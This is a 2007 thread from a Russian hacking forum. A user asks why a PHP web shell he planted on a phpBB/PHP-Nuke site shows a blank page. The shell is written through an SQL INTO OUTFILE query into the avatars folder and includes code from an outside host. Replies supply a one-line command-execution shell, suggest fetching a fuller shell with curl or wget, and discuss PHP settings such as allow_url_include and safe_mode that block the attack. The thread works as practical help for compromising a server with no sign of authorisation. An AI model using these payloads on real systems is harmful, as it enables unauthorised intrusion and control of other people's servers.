Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Проблемы при заливке шелла (https://forum.antichat.xyz/showthread.php?t=43722)

Azter 04.07.2007 20:54

Проблемы при заливке шелла
 
Заливаю шелл через востановление базы в phpbb
Код:

SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
Код исполняется это факт, но когда захожу на
http://host/Forums/images/avatars/shell.php - выбрасывает пустую страницу =( "?" - в конце не помогает.
Из-за чего такое может быть?

Y.Dmitriy 04.07.2007 20:56

в папке куда ты залил шел находится конфигурационный файл Апача...
с параметрами: "первый нах"(шутка, но только про имя параметра...)

maxster 04.07.2007 21:03

прав не хватает, что бы через бд файл заливать

Azter 04.07.2007 21:23

Цитата:

Сообщение от maxster
прав не хватает, что бы через бд файл заливать

не факт, обычно если не хватает прав, то вобще ничего не создается, и выбрасывает уведомления, а тут с этим все в порядке.

c411k 04.07.2007 21:31

если открывается пшп файл, то это уже есть гуд. скорей всего инклуд извне запрещен, так что пробни вначале
Код:

SELECT '<? phpinfo() ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
если при заходе на сцылко shell.php покажет те пшпинфо, то можешь заливать такой код
Код:

<? passthru($_GET[cmd]); ?>
потом юзай shell.php?cmd=ls

зы. а далее ищи качалки и заливай норм шелл (which curl;which wget;which fetch;which lynx etc )

The_HuliGun 04.07.2007 21:32

Возможно просто отключена возможность подключения удаленных файлов через include().
Создай файл с кодом
PHP код:

<?
 phpinfo
();
?>

и посмотри на директуву allow_url_fopen, если она off, тогда через include() ничего не вийдет.

nightmare007 04.07.2007 21:38

попробуй

Код:

SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE '/bla/bla-bla/Forums/images/avatars/shell.php';

Azter 04.07.2007 21:57

Такс phpinfo - катит
allow_url_fopen - on.
Все, теперь просто cmd - сделаю, но интересно почему - инклуд шелла не прокатил =(
Хотя все ясно
allow_url_include - Off
Чем можно заменить include? кажется можно curl, но как?

Azter 04.07.2007 22:07

Кстати
Код:

<? passthru($_GET[cmd]); ?>
не катит, при запросе любой команды тоже белая страница когда просто запустил shell.php то квакнуло Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\путь_к_шелу

The_HuliGun 04.07.2007 22:44

Может быть safe_mode = on, тогда не команды не выполняются.


Время: 05:02